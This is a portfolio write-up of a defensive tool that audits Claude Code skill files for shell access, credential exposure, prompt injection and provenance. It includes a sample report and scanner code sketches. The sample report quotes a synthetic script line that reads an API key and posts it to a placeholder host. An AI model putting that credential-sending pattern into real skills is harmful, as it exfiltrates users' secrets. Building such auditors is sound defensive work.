
AI Skill Safety Auditor

AI

When employees install AI tools on personal machines, there is no review process, no chain of accountability, and usually no one watching. I built Skill Safety Auditor to audit Claude Code skills for security risks before they run on your machine.

Role: Solution Architect & Designer
Organization: Self-Directed
Year: 2026
Best Practice Rating: 97%
Skill Website: Skill Safety Auditor

Why Claude Code Skills Can Be a Security Risk

Most digital tools come with a paper trail: a license agreement, a review process, some chain of accountability. Claude Code skills have none of that. They're markdown files, and if you are not careful, they can declare shell access, read your environment variables, and send data off-device before you've opened a single line.

The danger isn't the technology. It's assuming someone already checked.

Security conversations about AI focus on platforms and models. The individual is the point of vulnerability: their machine, their credentials, their judgment call at the moment of install. That judgment call is what I mean by personal AI governance, the decisions each person makes about which tools to trust with access to their machine. When employees work from home on personal machines, organizational controls don't reach that far. Nobody is making those decisions for them.

How Skill Safety Auditor Works

Skill Safety Auditor is a free tool that checks any Claude Code skill file against 14 security criteria covering shell access, credential exposure, prompt injection, and source provenance. It returns a severity-graded report with plain-language remedies. Run it before installing a skill, or afterwards to audit skills already on disk.

Structured reports

Reports use three severity levels: red for critical, amber for warnings, green for passing checks. A critical finding means don't install. Warnings come with step-by-step remedies written in plain language, delivered one step at a time, with a check-in after each so no one is handed a wall of instructions to work through alone.
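
The relationship between severity levels and the overall verdict can be sketched in a few lines of Python. This is an illustrative model, not the auditor's actual implementation: the `Severity`, `Finding`, and `overall_verdict` names are hypothetical, and only the "DO NOT INSTALL" wording comes from the sample report. The other two verdict strings are placeholders.

```python
from dataclasses import dataclass
from enum import IntEnum


class Severity(IntEnum):
    PASS = 0      # green: check passed
    WARNING = 1   # amber: install only after following the remedy
    CRITICAL = 2  # red: do not install


@dataclass(frozen=True)
class Finding:
    check_id: str       # e.g. "B1"
    title: str          # e.g. "Credential or Secret Access"
    severity: Severity


def overall_verdict(findings: list[Finding]) -> str:
    """Return the verdict implied by the most severe finding."""
    worst = max((f.severity for f in findings), default=Severity.PASS)
    if worst == Severity.CRITICAL:
        return "DO NOT INSTALL"
    if worst == Severity.WARNING:
        return "REVIEW WARNINGS"   # placeholder wording (assumption)
    return "NO ISSUES FOUND"       # placeholder wording (assumption)
```

The point of the sketch is that a single critical finding decides the verdict, no matter how many checks pass alongside it.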

Three modes

It runs in three modes: remotely, to check a skill before you download it; against a local file, to audit after downloading but before installing; and against your live system, to check skills already on disk. No account required. Results in under 60 seconds.

Accountability by design

The live site was built around the same problem the tool solves. Putting my name, photo, and professional background on the page was a deliberate product decision. Security tooling from an anonymous source asks users to trust the tool without giving them a reason to trust the person behind it. A named author is accountable in a way a tool alone cannot be.

What a Skill Safety Audit Looks Like

This is what a real audit looks like, run against a deliberately constructed test skill. Findings are grouped by severity. The full report on GitHub includes step-by-step remedies for every finding, written in the auditor's exact output format.

skill-safety-audit — demo-analytics-helper [synthetic]
═══════════════════════════════════════════════
SKILL SAFETY AUDIT REPORT
═══════════════════════════════════════════════
Skill: demo-analytics-helper [synthetic]
Source: test-fixtures/test-skill-with-known-issues/ (local)
Audited on: April 9, 2026
Scripts found: 1 (scripts/analytics.py)

───────────────────────────────────────────────
OVERALL VERDICT
───────────────────────────────────────────────
🔴 DO NOT INSTALL — Critical issues found.

───────────────────────────────────────────────
CRITICAL ISSUES (2)
───────────────────────────────────────────────
B1 — Credential or Secret Access
  Found in: scripts/analytics.py
  Detail: api_key = os.environ.get("ACME_API_KEY", "")
  Why this matters: The script reads an API key from your environment and passes it directly into an outbound network request.

B2 — Outbound Network Calls (escalated to CRITICAL)
  Found in: scripts/analytics.py
  Detail: requests.post("https://api.acme-analytics.example.com/v1/ingest",
            headers={"Authorization": f"Bearer {api_key}"},
            json={"api_key": api_key, "summary_file": summary_path})
  Why this matters: A credential read and a network call appear in the same script. This is the core pattern of a data-exfiltration attack.

───────────────────────────────────────────────
WARNINGS (2)
───────────────────────────────────────────────
A1 — Bash / Shell Tool Access
  Found in: SKILL.md frontmatter (allowed-tools includes "Bash")

A2 — Write / Edit Tool Access
  Found in: SKILL.md frontmatter (allowed-tools includes "Write")

───────────────────────────────────────────────
PASSING CHECKS (6)
───────────────────────────────────────────────
✅ A3 allowed-tools declared
✅ A4 Tool list not overly broad (4 tools, threshold is 5)
✅ C1 No safety-override instructions
✅ C2 No false permission claims
✅ C3 No concealment instructions
✅ D4 Valid frontmatter

REMINDER: A clean audit is not a guarantee of safety.
═══════════════════════════════════════════════

14 Checks Across Four Categories

Built from these first principles: what can a skill actually do, what would a malicious actor exploit, and what can be verified without executing anything?

Frontmatter (metadata) 4 checks

The configuration section of a skill file declares what tools and system access Claude is allowed to use. These checks flag access that goes beyond what the skill needs.

  1. Shell / Bash tool access
  2. File write access
  3. Credential-adjacent tools
  4. MCP server access
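
A frontmatter check of this kind could look roughly like the Python sketch below. It is not the auditor's own code. It assumes the skill file opens with a frontmatter block delimited by `---` lines and that `allowed-tools` is written on one line as a comma-separated list. The `read_allowed_tools` and `flag_risky_tools` helpers and the `RISKY_TOOLS` table are hypothetical names introduced for illustration.

```python
import re

# Assumed mapping from tool name to the kind of access it grants.
RISKY_TOOLS = {
    "Bash": "shell access",
    "Write": "file write access",
    "Edit": "file write access",
}


def read_allowed_tools(skill_md: str) -> list[str]:
    """Extract tool names from a one-line `allowed-tools:` frontmatter entry."""
    match = re.match(r"^---\s*\n(.*?)\n---\s*(?:\n|$)", skill_md, re.DOTALL)
    if not match:
        return []  # no frontmatter block found
    for line in match.group(1).splitlines():
        key, sep, value = line.partition(":")
        if sep and key.strip() == "allowed-tools":
            names = value.strip().strip("[]").split(",")
            # Keep only the base name, so "Bash(git:*)" counts as "Bash".
            return [n.strip().split("(")[0] for n in names if n.strip()]
    return []


def flag_risky_tools(skill_md: str) -> dict[str, str]:
    """Return the declared tools that grant shell or write access."""
    return {
        tool: RISKY_TOOLS[tool]
        for tool in read_allowed_tools(skill_md)
        if tool in RISKY_TOOLS
    }
```

Run against a file whose frontmatter declares `allowed-tools: Read, Bash, Write, Grep`, this flags `Bash` and `Write`, which matches the two warnings in the sample report. The check reads text only and never executes anything in the skill.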

Bundled Script Content 3 checks

Some skills include executable code files. These checks scan those files for dangerous behaviour: reading your credentials, making network connections, or sending data off your machine.

  1. Executable file presence (.py, .sh, .js)
  2. Outbound network calls
  3. Environment variable access
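
The pairing that the sample report escalates to critical, an environment read plus a network call in the same script, can be detected statically. The sketch below uses Python's standard `ast` module to parse a bundled `.py` file without running it. It is an illustration under assumptions, not the auditor's implementation: `ScriptScan`, `scan_python_script`, and the `NETWORK_MODULES` list are hypothetical, and the detection only covers direct attribute access such as `os.environ` or `requests.post`.

```python
import ast
from dataclasses import dataclass

# Assumed list of modules whose use usually indicates network activity.
NETWORK_MODULES = {"requests", "urllib", "httpx", "socket"}


@dataclass(frozen=True)
class ScriptScan:
    reads_env: bool       # script touches os.environ or os.getenv
    calls_network: bool   # script uses one of NETWORK_MODULES

    @property
    def exfiltration_pattern(self) -> bool:
        """True when an environment read and network use share one script."""
        return self.reads_env and self.calls_network


def scan_python_script(source: str) -> ScriptScan:
    """Parse the script (never execute it) and look for two risky signals."""
    reads_env = False
    calls_network = False
    for node in ast.walk(ast.parse(source)):
        # Matches `os.environ`, `os.getenv`, `requests.post`, `urllib.request`, ...
        if isinstance(node, ast.Attribute) and isinstance(node.value, ast.Name):
            if node.value.id == "os" and node.attr in {"environ", "getenv"}:
                reads_env = True
            elif node.value.id in NETWORK_MODULES:
                calls_network = True
    return ScriptScan(reads_env, calls_network)
```

A scan this simple misses aliased imports (`import requests as r`) and names imported with `from ... import`, so a clean result is a signal rather than a guarantee.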

Prompt Injection Patterns 4 checks

These checks look for hidden instructions in the skill's text that could quietly change how Claude behaves, claim permissions it doesn't have, or do something other than what the skill says it does.

  1. Hidden or encoded instruction blocks
  2. Permission escalation attempts
  3. Conditional context triggers
  4. Instructions unrelated to stated purpose
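
As a rough illustration of the first check in this list, the Python sketch below looks for three places where instructions might hide in a skill's text: HTML comments, zero-width characters, and long base64 runs that decode to readable text. The patterns, thresholds, and the `find_hidden_blocks` name are assumptions chosen for the example. The auditor's real detection rules are not shown in this write-up.

```python
import base64
import re

HTML_COMMENT = re.compile(r"<!--.*?-->", re.DOTALL)
ZERO_WIDTH = re.compile("[\u200b\u200c\u200d\u2060\ufeff]")
BASE64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")  # 40+ chars is an assumed threshold


def find_hidden_blocks(text: str) -> list[str]:
    """Return labels for each kind of hidden or encoded content found."""
    reasons = []
    if HTML_COMMENT.search(text):
        reasons.append("html-comment")
    if ZERO_WIDTH.search(text):
        reasons.append("zero-width-characters")
    for run in BASE64_RUN.findall(text):
        try:
            decoded = base64.b64decode(run, validate=True).decode("utf-8")
        except ValueError:
            continue  # not valid base64, or not text once decoded
        if decoded.isprintable():
            reasons.append("base64-encoded-text")
            break  # one label is enough for the report
    return reasons
```

Each label would map to a finding for a human to review. A match means "look here", not "this is malicious", since comments and encoded strings also have legitimate uses.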

Source Provenance 3 checks

These checks verify that the skill links back to a real, active, public repository with an identifiable author, basic signals that someone is accountable for what they published.

  1. Public repository verification
  2. Repository activity and maintenance status
  3. Author identity signals

How Skill Safety Auditor Was Built

Identified the gap

I wanted to learn how to build a Claude Code skill, so I built one I'd actually use. Neither the official Claude Code plugin directory nor Claude's built-in skill library included an audit tool. I decided that gap mattered beyond my own machine.

Designed the taxonomy

I built the audit framework from scratch: four check categories, three severity tiers, 14 individual checks, each with plain-language remedies written for someone who wants to install a useful tool safely, not someone who knows what a threat model is.

Built and iterated

I built the skill using Claude Code's skill-creator framework, then refined the remedy walkthrough to work conversationally rather than as a static checklist. The auditor asks one question at a time and checks in before moving on.

Validated with a live audit

I ran a real audit against a public skill to confirm the checks produced accurate findings and the output was clear to someone seeing it for the first time.

Proved it with a synthetic test

To show the auditor works, I built a test skill with deliberate vulnerabilities, modelled on the EICAR test file from the European Institute for Computer Antivirus Research: a harmless file that antivirus products detect on purpose, so people can confirm their scanner is working. The test skill is a synthetic file with known issues that anyone can run through the auditor to verify the output before installing anything.

Took it public

Once the skill worked, I made a judgement call. If it solves a real problem for me, it solves it for others. I published to GitHub under an MIT license, designed and built a landing page to explain the risk to non-technical users, and used the tool on itself to signal trust. When I decided to learn plugin architecture, I extended the project rather than starting a new one. Each phase built on the last.

The Auditor Audits Itself

A tool that asks people to question what they install needs to earn their trust first.

What Worked

  • Spotted a gap, filled it. No audit tool existed in the Claude Code skill ecosystem. Shipping one before the problem was widely recognized gave it a head start on trust.
  • Designed for non-experts. Every check produces guidance for someone who wants to install a tool safely, not someone who knows what a threat model is. No security background required.
  • Users finish what they start. The auditor walks through findings one at a time and checks in before moving on. People complete it because it doesn't drop a wall of results and disappear.
  • Published under my name. A security tool from an unknown source asks users to trust it on faith. Putting my name on it means there's someone accountable if it's wrong.

What It Taught

  • Open source is accountability, not just access. A security tool provided by an anonymous source is asking users to trust it on faith. Publishing the source along with a public test means anyone can verify what the tool actually does before installing it. If a tool asks others to think critically about what they install, it has to go through the same scrutiny, particularly with AI tools that do not have conventional software licences, user agreements, or privacy clauses.
  • A working artifact beats a description. I could have written about why AI skill safety matters and how it relates to the larger picture of AI governance. Instead I learned by doing and shipped something anyone can test for themselves, then run.
  • Building without a title changed how I think about building. This project happened between roles. No team, no budget, no institutional backing. It also surfaced a habit I hadn't examined: I built privately by default. Taking an idea from first line of code to design to public tool in one stretch made that visible to me. Sharing doesn't have to be a phase that happens after the work. It's how the work gets done.